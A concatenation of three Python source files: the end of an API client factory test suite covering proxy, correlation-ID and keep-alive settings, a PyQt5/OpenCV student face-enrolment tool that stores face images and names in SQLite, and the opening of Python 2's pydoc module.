if secrets["proxy"].get("address", None) is None:
self.skipTest(f"missing proxy configuration")
secrets_file = TempFileManager.create_temp_file(secrets)
# Load the config
factory = ApiClientFactory(api_secrets_filename=secrets_file.name)
# Close and thus delete the temporary file
TempFileManager.delete_temp_file(secrets_file)
api = factory.build(InstrumentsApi)
self.validate_api(api)
def test_get_api_with_proxy_config(self):
secrets = {
"api": {
config_keys[key]["config"]: value for key, value in source_config_details.items() if
value is not None and "proxy" not in key
}
}
secrets["api"].pop("clientCertificate", None)
if source_config_details.get("proxy_address", None) is None:
self.skipTest(f"missing proxy configuration")
secrets_file = TempFileManager.create_temp_file(secrets)
# Load the config
with patch.dict('os.environ', {}, clear=True):
factory = ApiClientFactory(
api_secrets_filename=secrets_file.name,
proxy_url=source_config_details["proxy_address"],
proxy_username=source_config_details["proxy_username"],
proxy_password=source_config_details["proxy_password"])
# Close and thus delete the temporary file
TempFileManager.delete_temp_file(secrets_file)
api = factory.build(InstrumentsApi)
self.validate_api(api)
def test_get_api_with_correlation_id_from_env_var(self):
env_vars = {config_keys[key]["env"]: value for key, value in source_config_details.items() if value is not None}
env_vars["FBN_CORRELATION_ID"] = "env-correlation-id"
with patch.dict('os.environ', env_vars, clear=True):
factory = ApiClientFactory()
api = factory.build(InstrumentsApi)
self.assertIsInstance(api, InstrumentsApi)
self.validate_api(api)
self.assertTrue("CorrelationId" in api.api_client.default_headers, msg="CorrelationId not found in headers")
self.assertEquals(api.api_client.default_headers["CorrelationId"], "env-correlation-id")
def test_get_api_with_correlation_id_from_param(self):
env_vars = {config_keys[key]["env"]: value for key, value in source_config_details.items() if value is not None}
with patch.dict('os.environ', env_vars, clear=True):
factory = ApiClientFactory(
api_secrets_filename=CredentialsSource.secrets_path(),
correlation_id="param-correlation-id"
)
api = factory.build(InstrumentsApi)
self.assertIsInstance(api, InstrumentsApi)
self.validate_api(api)
self.assertTrue("CorrelationId" in api.api_client.default_headers, msg="CorrelationId not found in headers")
self.assertEquals(api.api_client.default_headers["CorrelationId"], "param-correlation-id")
def test_get_api_with_tcp_keep_alive(self):
api_factory = ApiClientFactory(
api_secrets_filename=CredentialsSource.secrets_path(),
tcp_keep_alive=True
)
# Make sure tcp_keep_alive was passed through all of the layers
self.assertTrue(api_factory.api_client.configuration.tcp_keep_alive)
self.assertIsInstance(api_factory.api_client.rest_client.pool_manager,
(TCPKeepAlivePoolManager, TCPKeepAliveProxyManager))
def test_get_api_without_tcp_keep_alive(self):
api_factory = ApiClientFactory(api_secrets_filename=CredentialsSource.secrets_path())
# Make sure tcp_keep_alive was passed through all of the layers
self.assertFalse(api_factory.api_client.configuration.tcp_keep_alive)
self.assertIsInstance(api_factory.api_client.rest_client.pool_manager, (PoolManager, ProxyManager))
def test_use_apifactory_with_id_provider_response_handler(self):
"""
Ensures that an id_provider_response handler that is passed to the ApiClientFactory can be used during
communication with the id provider (if appropriate).
"""
responses = []
def record_response(id_provider_response):
nonlocal responses
responses.append(id_provider_response.status_code)
api_factory = ApiClientFactory(
api_secrets_filename=CredentialsSource.secrets_path(),
id_provider_response_handler=record_response
)
api = api_factory.build(InstrumentsApi)
self.validate_api(api)
self.assertGreater(len(responses), 0)
def test_use_apifactory_multiple_threads(self):
access_token = str(ApiClientFactory(
api_secrets_filename=CredentialsSource.secrets_path()
).api_client.configuration.access_token)
api_factory = ApiClientFactory(
api_secrets_filename=CredentialsSource.secrets_path()
)
def get_identifier_types(factory):
return factory.build(InstrumentsApi).get_instrument_identifier_types()
thread1 = Thread(target=get_identifier_types, args=[api_factory])
thread2 = Thread(target=get_identifier_types, args=[api_factory])
thread3 = Thread(target=get_identifier_types, args=[api_factory])
with patch("requests.post") as identity_mock:
identity_mock.side_effect = lambda *args, **kwargs: MockApiResponse(
json_data={
"access_token": f"{access_token}",
"refresh_token": "mock_refresh_token",
"expires_in": 3600
},
status_code=200
)
thread1.start()
thread2.start()
thread3.start()
thread1.join()
thread2.join()
thread3.join()
# Ensure that we only got an access token once
self.assertEqual(1, identity_mock.call_count)
|
dataRecord.py
|
# 用户取消了更新数据库操作
import logging.config
import os
import queue
import sqlite3
import sys
import threading
from datetime import datetime
import cv2
from PyQt5.QtCore import pyqtSignal, QTimer, QRegExp
from PyQt5.QtGui import QIcon, QImage, QPixmap, QTextCursor, QRegExpValidator
from PyQt5.QtWidgets import QWidget, QApplication, QMessageBox, QDialog
from PyQt5.uic import loadUi
# 用户取消了更新数据库操作
class OperationCancel(Exception):
pass
# 采集过程中出现干扰
class RecordDisturbance(Exception):
pass
# 用户信息填写对话框
class UserInfoDialog(QDialog):
def __init__(self):
super(UserInfoDialog, self).__init__()
# 初始化UI
loadUi('./ui/UserInfoDialog.ui', self)
self.setWindowIcon(QIcon('./icons/icon.png'))
self.setFixedSize(425, 300)
# 使用正则表达式限制用户输入
# 1.限制用户学号输入
stu_id_regx = QRegExp('^[0-9]{12}$')
stu_id_validator = QRegExpValidator(stu_id_regx, self.stuIDLineEdit)
self.stuIDLineEdit.setValidator(stu_id_validator)
# 2.限制用户姓名输入
cn_name_regx = QRegExp('^[\u4e00-\u9fa5]{1,10}$')
cn_name_validator = QRegExpValidator(cn_name_regx, self.cnNameLineEdit)
self.cnNameLineEdit.setValidator(cn_name_validator)
# 3.限制用户汉语拼音输入
en_name_regx = QRegExp('^[ A-Za-z]{1,16}$')
en_name_validator = QRegExpValidator(en_name_regx, self.enNameLineEdit)
self.enNameLineEdit.setValidator(en_name_validator)
class DataRecordUI(QWidget):
# 传递Log信号
receiveLogSignal = pyqtSignal(str)
def __init__(self):
super(DataRecordUI, self).__init__()
# 初始化UI
loadUi('./ui/DataRecord.ui', self)
self.setWindowIcon(QIcon('./icons/icon.png'))
self.setFixedSize(1011, 601)
# OpenCV
self.cap = cv2.VideoCapture()
self.faceCascade = cv2.CascadeClassifier('./haarcascades/haarcascade_frontalface_default.xml')
self.logQueue = queue.Queue() # 日志队列
# 图像捕获
self.isExternalCameraUsed = False # 是否使用外接摄像头
self.useExternalCameraCheckBox.stateChanged.connect(
lambda: self.useExternalCamera(self.useExternalCameraCheckBox)
) # 定义使用外接摄像头CheckBox点击事件
self.startWebcamButton.toggled.connect(self.startWebcam) # 定义打开摄像头按钮点击实践
self.startWebcamButton.setCheckable(True)
# 定时器
self.timer = QTimer(self)
self.timer.timeout.connect(self.updateFrame) # 利用定时器更新Frame
# 人脸检测
self.isFaceDetectEnabled = False
self.enableFaceDetectButton.toggled.connect(self.enableFaceDetect) # 定义开启人脸检测按钮点击事件
self.enableFaceDetectButton.setCheckable(True)
# 数据库
self.database = './FaceBase.db' # 数据库地址
self.datasets = './datasets' # 数据集地址
self.isDbReady = False # 这个状态表示数据库是否准备好
self.initDbButton.setIcon(QIcon('./icons/warning.png'))
self.initDbButton.clicked.connect(self.initDb) # 设置初始化数据库按钮点击事件
# 用户信息
self.isUserInfoReady = False # 这个状态表示用户信息是否已经准备好
self.userInfo = {'stu_id': '', 'cn_name': '', 'en_name': ''} # 这里存储输入的用户信息
self.addOrUpdateUserInfoButton.clicked.connect(self.addOrUpdateUserInfo) # 设置增加用户/修改用户资料按钮点击事件
self.migrateToDbButton.clicked.connect(self.migrateToDb) # 设置同步到数据库点击按钮事件
# 人脸采集
self.startFaceRecordButton.clicked.connect(
lambda: self.startFaceRecord(self.startFaceRecordButton)
) # 定义开始采集人脸数据按钮点击事件
self.faceRecordCount = 0 # 已经采集的人脸数量
self.minFaceRecordCount = 100 # 最低需要采集的人脸数量
self.isFaceDataReady = False # 人脸数据是否准备好
self.isFaceRecordEnabled = False # 人脸采集是否允许
self.enableFaceRecordButton.clicked.connect(self.enableFaceRecord) # 采集当前捕获帧按钮点击事件
# 日志系统
self.receiveLogSignal.connect(lambda log: self.logOutput(log)) # receiveLogSignal信号绑定事件
self.logOutputThread = threading.Thread(target=self.receiveLog, daemon=True) # Log输入后台线程
self.logOutputThread.start() # 启动Log线程
# 是否使用外接摄像头CheckBox点击事件
def useExternalCamera(self, useExternalCameraCheckBox):
if useExternalCameraCheckBox.isChecked():
self.isExternalCameraUsed = True
else:
self.isExternalCameraUsed = False
# 打开/关闭摄像头按钮点击事件
def startWebcam(self, status):
if status: # 打开摄像头
if self.isExternalCameraUsed:
camID = 1
else:
camID = 0
self.cap.open(camID) # 打开摄像头
self.cap.set(cv2.CAP_PROP_FRAME_WIDTH, 640) # 设置Frame宽度
self.cap.set(cv2.CAP_PROP_FRAME_HEIGHT, 480) # 设置Frame高度
ret, frame = self.cap.read() # 预读取一张Frame
if not ret: # 如果读取失败
logging.error('无法调用电脑摄像头{}'.format(camID))
self.logQueue.put('Error:初始化摄像头失败')
self.cap.release() # 释放当前摄像头
self.startWebcamButton.setIcon(QIcon('./icons/error.png'))
self.startWebcamButton.setChecked(False)
else: # 如果读取成功
self.startWebcamButton.setText('关闭摄像头')
self.enableFaceDetectButton.setEnabled(True) # 允许点击开启人脸检测按钮
self.timer.start(5) # 利用定时器更新Frame
self.startWebcamButton.setIcon(QIcon('./icons/success.png'))
else: # 关闭摄像头
if self.cap.isOpened():
if self.timer.isActive():
self.timer.stop() # 停止Frame更新
self.cap.release() # 释放当前摄像头
self.faceDetectCaptureLabel.clear()
self.faceDetectCaptureLabel.setText('<font color=red>摄像头未开启</font>') # 设置label显示为摄像头未开启
self.startWebcamButton.setText('打开摄像头') # 修改为打开摄像头
self.enableFaceDetectButton.setEnabled(False) # 禁止点击人脸检测按钮
self.startWebcamButton.setIcon(QIcon())
# 开启/关闭人脸检测按钮点击事件
def enableFaceDetect(self, status):
if self.cap.isOpened(): # 摄像头必须打开
if status: # 开启人脸检测
self.enableFaceDetectButton.setText('关闭人脸检测')
self.isFaceDetectEnabled = True
else: # 关闭人脸检测
self.enableFaceDetectButton.setText('开启人脸检测')
self.isFaceDetectEnabled = False
# 采集当前捕获帧按钮点击事件
def enableFaceRecord(self):
if not self.isFaceRecordEnabled:
self.isFaceRecordEnabled = True
# timer定时器事件,不断更新Frame
def updateFrame(self):
ret, frame = self.cap.read() # 读取一帧
# self.image = cv2.flip(self.image, 1)
if ret: # 读取成功
self.displayImage(frame) # 展示图片
if self.isFaceDetectEnabled: # 如果开启了人脸检测
detected_frame = self.detectFace(frame)
self.displayImage(detected_frame) # 展示检测人脸后的图片
else:
self.displayImage(frame) # 直接展示原来的图片
# 初始化数据库按钮点击事件
def initDb(self):
conn = sqlite3.connect(self.database)
cursor = conn.cursor()
try:
# 检测人脸数据目录是否存在,不存在则创建
if not os.path.isdir(self.datasets):
os.makedirs(self.datasets)
# 查询数据表是否存在,不存在则创建
# 学号,人脸编号,中文名,英文名,创建日期
cursor.execute('''CREATE TABLE IF NOT EXISTS users (
stu_id VARCHAR(12) PRIMARY KEY NOT NULL,
face_id INTEGER DEFAULT -1,
cn_name VARCHAR(10) NOT NULL,
en_name VARCHAR(16) NOT NULL,
created_time DATE DEFAULT (date('now','localtime'))
)
''')
# 查询数据表记录数
cursor.execute('SELECT Count(*) FROM users')
result = cursor.fetchone()
dbUserCount = result[0] # 记录当前用户数量
except Exception as e:
logging.error('读取数据库异常,无法完成数据库初始化')
self.isDbReady = False # 数据库没有准备好
self.initDbButton.setIcon(QIcon('./icons/error.png'))
self.logQueue.put('Error:初始化数据库失败')
else:
self.isDbReady = True # 数据库已经准备好
self.dbUserCountLcdNum.display(dbUserCount) # 显示数据库已存人脸样本数
self.logQueue.put('Success:数据库初始化完成')
self.initDbButton.setIcon(QIcon('./icons/success.png'))
self.initDbButton.setEnabled(False)
self.addOrUpdateUserInfoButton.setEnabled(True) # 允许点击添加或修改用户信息按钮
finally:
cursor.close()
conn.commit()
conn.close()
# 在图片中检测人脸,updateFrame程序调用
def detectFace(self, frame):
gray = cv2.cvtColor(frame, cv2.COLOR_BGR2GRAY) # 将Frame转换为灰度图
faces = self.faceCascade.detectMultiScale(gray, 1.3, 5, minSize=(90, 90)) # 加载OPENCV官方的人脸分类器
stu_id = self.userInfo.get('stu_id') # 获得当前用户学号
for (x, y, w, h) in faces:
if self.isFaceRecordEnabled: # 允许进行人脸采集
try:
if not os.path.exists('{}/stu_{}'.format(self.datasets, stu_id)): # 如果不存在该学生datasets
# ,则创建当前学生datasets
os.makedirs('{}/stu_{}'.format(self.datasets, stu_id))
if len(faces) > 1: # 采集到多张人脸
raise RecordDisturbance
# 保存已采集图片
cv2.imwrite('{}/stu_{}/img.{}.jpg'.format(self.datasets, stu_id, self.faceRecordCount + 1),
gray[y - 20:y + h + 20, x - 20:x + w + 20])
except RecordDisturbance: # 捕获到采集到多张人脸干扰异常
self.isFaceRecordEnabled = False
logging.error('检测到多张人脸或环境干扰')
self.logQueue.put('Warning:检测到多张人脸或环境干扰,请解决问题后继续')
self.enableFaceRecordButton.setIcon(QIcon('./icons/warning.png'))
continue
except Exception as e: # 捕获到其他异常
logging.error('写入人脸图像文件到计算机过程中发生异常')
self.enableFaceRecordButton.setIcon(QIcon('./icons/error.png'))
self.logQueue.put('Error:无法保存人脸图像,采集当前捕获帧失败')
else: # 没有出现异常
self.enableFaceRecordButton.setIcon(QIcon('./icons/success.png'))
self.faceRecordCount = self.faceRecordCount + 1 # 增加已采集人脸样本数
self.isFaceRecordEnabled = False
self.faceRecordCountLcdNum.display(self.faceRecordCount)
cv2.rectangle(frame, (x - 5, y - 10), (x + w + 5, y + h + 10), (0, 0, 255), 2) # 在Frame上绘制人脸矩形
return frame # 返回绘制矩形后的Frame
# 增加用户/修改用户资料按钮点击事件
def addOrUpdateUserInfo(self):
self.userInfoDialog = UserInfoDialog()
stu_id, cn_name, en_name = self.userInfo.get('stu_id'), self.userInfo.get('cn_name'), self.userInfo.get(
'en_name') # 尝试获取上次添加或修改的用户信息
self.userInfoDialog.stuIDLineEdit.setText(stu_id)
self.userInfoDialog.cnNameLineEdit.setText(cn_name)
self.userInfoDialog.enNameLineEdit.setText(en_name)
self.userInfoDialog.okButton.clicked.connect(self.checkToApplyUserInfo) # 填好了按钮点击事件
self.userInfoDialog.exec() # 显示userInfoDialog
# 校验用户信息并提交,填好了按钮点击事件
def checkToApplyUserInfo(self):
if not (self.userInfoDialog.stuIDLineEdit.hasAcceptableInput() and
self.userInfoDialog.cnNameLineEdit.hasAcceptableInput() and
self.userInfoDialog.enNameLineEdit.hasAcceptableInput()): # 如果输入有误
self.userInfoDialog.msgLabel.setText('<font color=red>你的输入有误,提交失败,请检查并重试!</font>')
else: # 如果输入符合格式
# 获取用户输入,保存到userInfo字典里面
self.userInfo['stu_id'] = self.userInfoDialog.stuIDLineEdit.text().strip()
self.userInfo['cn_name'] = self.userInfoDialog.cnNameLineEdit.text().strip()
self.userInfo['en_name'] = self.userInfoDialog.enNameLineEdit.text().strip()
# 信息确认
stu_id, cn_name, en_name = self.userInfo.get('stu_id'), self.userInfo.get('cn_name'), self.userInfo.get(
'en_name')
self.stuIDLineEdit.setText(stu_id) # 在当前UI中显示输入的学号
self.cnNameLineEdit.setText(cn_name) # 在当前UI中显示输入的中文名
self.enNameLineEdit.setText(en_name) # 在当前UI中显示输入的英文名
self.isUserInfoReady = True # 用户信息已经输入完毕
if not self.startFaceRecordButton.isEnabled(): # 可以开始采集
self.startFaceRecordButton.setEnabled(True)
self.migrateToDbButton.setIcon(QIcon())
# 关闭对话框
self.userInfoDialog.close()
# 同步到数据库点击按钮事件
def migrateToDb(self):
if self.isFaceDataReady: # 人脸数据已经尊卑好
stu_id, cn_name, en_name = self.userInfo.get('stu_id'), self.userInfo.get('cn_name'), self.userInfo.get(
'en_name') # 获取学号,中文名,英文名
conn = sqlite3.connect(self.database)
cursor = conn.cursor()
try:
cursor.execute('SELECT * FROM users WHERE stu_id=?', (stu_id,))
if cursor.fetchall(): # 如果已经存在该用户
text = '数据库已存在学号为 <font color=blue>{}</font> 的用户记录。'.format(stu_id)
informativeText = '<b>是否覆盖?</b>'
ret = DataRecordUI.callDialog(QMessageBox.Warning, text, informativeText,
QMessageBox.Yes | QMessageBox.No)
if ret == QMessageBox.Yes:
# 更新已有记录
cursor.execute('UPDATE users SET cn_name=?, en_name=? WHERE stu_id=?',
(cn_name, en_name, stu_id,))
else:
raise OperationCancel # 记录取消覆盖操作
else: # 数据库中不存在该用户
# 插入新记录
cursor.execute('INSERT INTO users (stu_id, cn_name, en_name) VALUES (?, ?, ?)',
(stu_id, cn_name, en_name,))
cursor.execute('SELECT Count(*) FROM users')
result = cursor.fetchone()
dbUserCount = result[0] # 更新dbUserCount信息
except OperationCancel:
pass
except Exception as e:
logging.error('读写数据库异常,无法向数据库插入/更新记录')
self.migrateToDbButton.setIcon(QIcon('./icons/error.png'))
self.logQueue.put('Error:读写数据库异常,同步失败')
else:
text = '<font color=blue>{}</font> 已添加/更新到数据库。'.format(stu_id)
informativeText = '<b><font color=blue>{}</font> 的人脸数据采集已完成!</b>'.format(cn_name)
DataRecordUI.callDialog(QMessageBox.Information, text, informativeText, QMessageBox.Ok)
# 清空用户信息缓存
for key in self.userInfo.keys():
self.userInfo[key] = ''
self.isUserInfoReady = False
self.faceRecordCount = 0
self.isFaceDataReady = False
self.faceRecordCountLcdNum.display(self.faceRecordCount)
self.dbUserCountLcdNum.display(dbUserCount)
# 清空历史输入
self.stuIDLineEdit.clear()
self.cnNameLineEdit.clear()
self.enNameLineEdit.clear()
self.migrateToDbButton.setIcon(QIcon('./icons/success.png'))
# 允许继续增加新用户
self.addOrUpdateUserInfoButton.setEnabled(True)
self.migrateToDbButton.setEnabled(False)
finally:
cursor.close()
conn.commit()
conn.close()
else:
self.logQueue.put('Error:操作失败,你尚未完成人脸数据采集')
self.migrateToDbButton.setIcon(QIcon('./icons/error.png'))
# 开始采集人脸数据按钮点击事件
def startFaceRecord(self, startFaceRecordButton):
if startFaceRecordButton.text() == '开始采集人脸数据':
if self.isFaceDetectEnabled: # 允许人脸检测
if self.isUserInfoReady: # 用户信息已经准备好
self.addOrUpdateUserInfoButton.setEnabled(False) # 此时禁止添加或者修改用户信息
if not self.enableFaceRecordButton.isEnabled(): # 允许点击采集当前捕获帧按钮
self.enableFaceRecordButton.setEnabled(True)
self.enableFaceRecordButton.setIcon(QIcon())
self.startFaceRecordButton.setIcon(QIcon('./icons/success.png'))
self.startFaceRecordButton.setText('结束当前人脸采集')
else: # 用户信息没有准备好
self.startFaceRecordButton.setIcon(QIcon('./icons/error.png'))
self.startFaceRecordButton.setChecked(False)
self.logQueue.put('Error:操作失败,系统未检测到有效的用户信息')
else: # 不允许进行人脸检测
self.startFaceRecordButton.setIcon(QIcon('./icons/error.png'))
self.logQueue.put('Error:操作失败,请开启人脸检测')
else: # 点击采集结束
if self.faceRecordCount < self.minFaceRecordCount: # 采集数量小于当前最低要求的人脸采集数量
text = '系统当前采集了 <font color=blue>{}</font> 帧图像,采集数据过少会导致较大的识别误差。'.format(self.faceRecordCount)
informativeText = '<b>请至少采集 <font color=red>{}</font> 帧图像。</b>'.format(self.minFaceRecordCount)
DataRecordUI.callDialog(QMessageBox.Information, text, informativeText, QMessageBox.Ok)
else: # 采集数量大于当前最低要求的人脸采集数量
text = '系统当前采集了 <font color=blue>{}</font> 帧图像,继续采集可以提高识别准确率。'.format(self.faceRecordCount)
informativeText = '<b>你确定结束当前人脸采集吗?</b>'
ret = DataRecordUI.callDialog(QMessageBox.Question, text, informativeText,
QMessageBox.Yes | QMessageBox.No,
QMessageBox.No)
if ret == QMessageBox.Yes:
self.isFaceDataReady = True # 人脸数据已经准备好
if self.isFaceRecordEnabled: # 禁止人脸数据采集
self.isFaceRecordEnabled = False
self.enableFaceRecordButton.setEnabled(False)
self.enableFaceRecordButton.setIcon(QIcon())
self.startFaceRecordButton.setText('开始采集人脸数据')
self.startFaceRecordButton.setEnabled(False)
self.startFaceRecordButton.setIcon(QIcon())
self.migrateToDbButton.setEnabled(True)
# receiveLogSignal信号绑定事件,输出LOG日志,log参数为str类型
def logOutput(self, log):
# 获取当前系统时间
time = datetime.now().strftime('[%Y/%m/%d %H:%M:%S]')
log = time + ' ' + log + '\n'
self.logTextEdit.moveCursor(QTextCursor.End)
self.logTextEdit.insertPlainText(log)
self.logTextEdit.ensureCursorVisible() # 自动滚屏
# 获得log并发出receiveLogSignal信号,从而logOutput捕获到进行输出
def receiveLog(self):
while True:
data = self.logQueue.get() # 获取log队列中的log
if data:
self.receiveLogSignal.emit(data) # 发出receiveLogSignal信号
else:
continue
# 显示图像,updateFrame程序调用
def displayImage(self, img):
# BGR -> RGB
img = cv2.cvtColor(img, cv2.COLOR_BGR2RGB)
# default:The image is stored using 8-bit indexes into a colormap, for example:a gray image
qformat = QImage.Format_Indexed8 #默认为灰度图片
if len(img.shape) == 3: # rows[0], cols[1], channels[2]
if img.shape[2] == 4: # 4通道,即RGB+透明度彩色图片
# The image is stored using a 32-bit byte-ordered RGBA format (8-8-8-8)
# A: alpha channel,不透明度参数。如果一个像素的alpha通道数值为0%,那它就是完全透明的
qformat = QImage.Format_RGBA8888
else: # 3通道,RGB彩色图片
qformat = QImage.Format_RGB888
# img.shape[1]:图像宽度width,img.shape[0]:图像高度height,img.shape[2]:图像通道数
# QImage.__init__ (self, bytes data, int width, int height, int bytesPerLine, Format format)
# 从内存缓冲流获取img数据构造QImage类
# img.strides[0]:每行的字节数(width*3),rgb为3,rgba为4
# strides[0]为最外层(即一个二维数组所占的字节长度),strides[1]为次外层(即一维数组所占字节长度),strides[2]为最内层(即一个元素所占字节长度)
# 从里往外看,strides[2]为1个字节长度(uint8),strides[1]为3*1个字节长度(3即rgb 3个通道)
# strides[0]为width*3个字节长度,width代表一行有几个像素
outImage = QImage(img, img.shape[1], img.shape[0], img.strides[0], qformat)
self.faceDetectCaptureLabel.setPixmap(QPixmap.fromImage(outImage)) # 设置显示图片
self.faceDetectCaptureLabel.setScaledContents(True) # 设置自适应
# 系统对话框
@staticmethod
def callDialog(icon, text, informativeText, standardButtons, defaultButton=None):
msg = QMessageBox()
msg.setWindowIcon(QIcon('./icons/icon.png'))
msg.setWindowTitle('OpenCV Face Recognition System - DataRecord')
msg.setIcon(icon)
msg.setText(text)
msg.setInformativeText(informativeText)
msg.setStandardButtons(standardButtons)
if defaultButton:
msg.setDefaultButton(defaultButton)
return msg.exec()
# 窗口关闭事件,关闭定时器、摄像头
def closeEvent(self, event):
if self.timer.isActive():
self.timer.stop()
if self.cap.isOpened():
self.cap.release()
event.accept()
if __name__ == '__main__':
logging.config.fileConfig('./config/logging.cfg')
app = QApplication(sys.argv)
window = DataRecordUI()
# window = UserInfoDialog()
window.show()
sys.exit(app.exec())
|
pydoc.py
|
#!/usr/bin/env python
# -*- coding: latin-1 -*-
"""Generate Python documentation in HTML or text for interactive use.
In the Python interpreter, do "from pydoc import help" to provide online
help. Calling help(thing) on a Python object documents the object.
Or, at the shell command line outside of Python:
Run "pydoc <name>" to show documentation on something. <name> may be
the name of a function, module, package, or a dotted reference to a
class or function within a module or module in a package. If the
argument contains a path segment delimiter (e.g. slash on Unix,
backslash on Windows) it is treated as the path to a Python source file.
Run "pydoc -k <keyword>" to search for a keyword in the synopsis lines
of all available modules.
Run "pydoc -p <port>" to start an HTTP server on a given port on the
local machine to generate documentation web pages.
For platforms without a command line, "pydoc -g" starts the HTTP server
and also pops up a little window for controlling it.
Run "pydoc -w <name>" to write out the HTML documentation for a module
to a file named "<name>.html".
Module docs for core modules are assumed to be in
http://docs.python.org/library/
This can be overridden by setting the PYTHONDOCS environment variable
to a different URL or to a local directory containing the Library
Reference Manual pages.
"""
__author__ = "Ka-Ping Yee <[email protected]>"
__date__ = "26 February 2001"
__version__ = "$Revision: 88564 $"
__credits__ = """Guido van Rossum, for an excellent programming language.
Tommy Burnette, the original creator of manpy.
Paul Prescod, for all his work on onlinehelp.
Richard Chamberlain, for the first implementation of textdoc.
"""
# Known bugs that can't be fixed here:
# - imp.load_module() cannot be prevented from clobbering existing
# loaded modules, so calling synopsis() on a binary module file
# changes the contents of any existing module with the same name.
# - If the __file__ attribute on a module is a relative path and
# the current directory is changed with os.chdir(), an incorrect
# path will be displayed.
import sys, imp, os, re, types, inspect, __builtin__, pkgutil, warnings
from repr import Repr
from string import expandtabs, find, join, lower, split, strip, rfind, rstrip
from traceback import extract_tb
try:
from collections import deque
except ImportError:
# Python 2.3 compatibility
class deque(list):
def popleft(self):
return self.pop(0)
# --------------------------------------------------------- common routines
def pathdirs():
"""Convert sys.path into a list of absolute, existing, unique paths."""
dirs = []
normdirs = []
for dir in sys.path:
dir = os.path.abspath(dir or '.')
normdir = os.path.normcase(dir)
if normdir not in normdirs and os.path.isdir(dir):
dirs.append(dir)
normdirs.append(normdir)
return dirs
def getdoc(object):
"""Get the doc string or comments for an object."""
result = inspect.getdoc(object) or inspect.getcomments(object)
result = _encode(result)
return result and re.sub('^ *\n', '', rstrip(result)) or ''
def splitdoc(doc):
"""Split a doc string into a synopsis line (if any) and the rest."""
lines = split(strip(doc), '\n')
if len(lines) == 1:
return lines[0], ''
elif len(lines) >= 2 and not rstrip(lines[1]):
return lines[0], join(lines[2:], '\n')
return '', join(lines, '\n')
def classname(object, modname):
"""Get a class name and qualify it with a module name if necessary."""
name = object.__name__
if object.__module__ != modname:
name = object.__module__ + '.' + name
return name
def isdata(object):
"""Check if an object is of a type that probably means it's data."""
return not (inspect.ismodule(object) or inspect.isclass(object) or
inspect.isroutine(object) or inspect.isframe(object) or
inspect.istraceback(object) or inspect.iscode(object))
def replace(text, *pairs):
"""Do a series of global replacements on a string."""
while pairs:
text = join(split(text, pairs[0]), pairs[1])
pairs = pairs[2:]
return text
def cram(text, maxlen):
"""Omit part of a string if needed to make it fit in a maximum length."""
if len(text) > maxlen:
pre = max(0, (maxlen-3)//2)
post = max(0, maxlen-3-pre)
return text[:pre] + '...' + text[len(text)-post:]
return text
_re_stripid = re.compile(r' at 0x[0-9a-f]{6,16}(>+)$', re.IGNORECASE)
def stripid(text):
"""Remove the hexadecimal id from a Python object representation."""
# The behaviour of %p is implementation-dependent in terms of case.
return _re_stripid.sub(r'\1', text)
def _is_some_method(obj):
return inspect.ismethod(obj) or inspect.ismethoddescriptor(obj)
def allmethods(cl):
methods = {}
for key, value in inspect.getmembers(cl, _is_some_method):
methods[key] = 1
for base in cl.__bases__:
methods.update(allmethods(base)) # all your base are belong to us
for key in methods.keys():
methods[key] = getattr(cl, key)
return methods
def _split_list(s, predicate):
"""Split sequence s via predicate, and return pair ([true], [false]).
The return value is a 2-tuple of lists,
([x for x in s if predicate(x)],
[x for x in s if not predicate(x)])
"""
yes = []
no = []
for x in s:
if predicate(x):
yes.append(x)
else:
no.append(x)
return yes, no
def visiblename(name, all=None, obj=None):
"""Decide whether to show documentation on a variable."""
# Certain special names are redundant.
_hidden_names = ('__builtins__', '__doc__', '__file__', '__path__',
'__module__', '__name__', '__slots__', '__package__')
if name in _hidden_names: return 0
# Private names are hidden, but special names are displayed.
if name.startswith('__') and name.endswith('__'): return 1
# Namedtuples have public fields and methods with a single leading underscore
if name.startswith('_') and hasattr(obj, '_fields'):
return 1
if all is not None:
# only document that which the programmer exported in __all__
return name in all
else:
return not name.startswith('_')
def classify_class_attrs(object):
"""Wrap inspect.classify_class_attrs, with fixup for data descriptors."""
def fixup(data):
name, kind, cls, value = data
if inspect.isdatadescriptor(value):
kind = 'data descriptor'
return name, kind, cls, value
return map(fixup, inspect.classify_class_attrs(object))
# ----------------------------------------------------- Unicode support helpers
try:
_unicode = unicode
except NameError:
# If Python is built without Unicode support, the unicode type
# will not exist. Fake one that nothing will match, and make
# the _encode function that do nothing.
class _unicode(object):
pass
_encoding = 'ascii'
def _encode(text, encoding='ascii'):
return text
else:
import locale
_encoding = locale.getpreferredencoding()
def _encode(text, encoding=None):
if isinstance(text, unicode):
return text.encode(encoding or _encoding, 'xmlcharrefreplace')
else:
return text
def _binstr(obj):
# Ensure that we have an encoded (binary) string representation of obj,
# even if it is a unicode string.
if isinstance(obj, _unicode):
return obj.encode(_encoding, 'xmlcharrefreplace')
return str(obj)
# ----------------------------------------------------- module manipulation
def ispackage(path):
"""Guess whether a path refers to a package directory."""
if os.path.isdir(path):
for ext in ('.py', '.pyc', '.pyo'):
if os.path.isfile(os.path.join(path, '__init__' + ext)):
return True
return False
def source_synopsis(file):
line = file.readline()
while line[:1] == '#' or not strip(line):
line = file.readline()
if not line: break
line = strip(line)
if line[:4] == 'r"""': line = line[1:]
if line[:3] == '"""':
line = line[3:]
if line[-1:] == '\\': line = line[:-1]
while not strip(line):
line = file.readline()
if not line: break
result = strip(split(line, '"""')[0])
else: result = None
return result
def synopsis(filename, cache={}):
"""Get the one-line summary out of a module file."""
mtime = os.stat(filename).st_mtime
lastupdate, result = cache.get(filename, (None, None))
if lastupdate is None or lastupdate < mtime:
info = inspect.getmoduleinfo(filename)
try:
file = open(filename)
except IOError:
# module can't be opened, so skip it
return None
if info and 'b' in info[2]: # binary modules have to be imported
try: module = imp.load_module('__temp__', file, filename, info[1:])
except: return None
result = (module.__doc__ or '').splitlines()[0]
del sys.modules['__temp__']
else: # text modules can be directly examined
result = source_synopsis(file)
file.close()
cache[filename] = (mtime, result)
return result
class ErrorDuringImport(Exception):
"""Errors that occurred while trying to import something to document it."""
def __init__(self, filename, exc_info):
exc, value, tb = exc_info
self.filename = filename
self.exc = exc
self.value = value
self.tb = tb
def __str__(self):
exc = self.exc
if type(exc) is types.ClassType:
exc = exc.__name__
return 'problem in %s - %s: %s' % (self.filename, exc, self.value)
def importfile(path):
"""Import a Python source file or compiled file given its path."""
magic = imp.get_magic()
file = open(path, 'r')
if file.read(len(magic)) == magic:
kind = imp.PY_COMPILED
else:
kind = imp.PY_SOURCE
file.close()
filename = os.path.basename(path)
name, ext = os.path.splitext(filename)
file = open(path, 'r')
try:
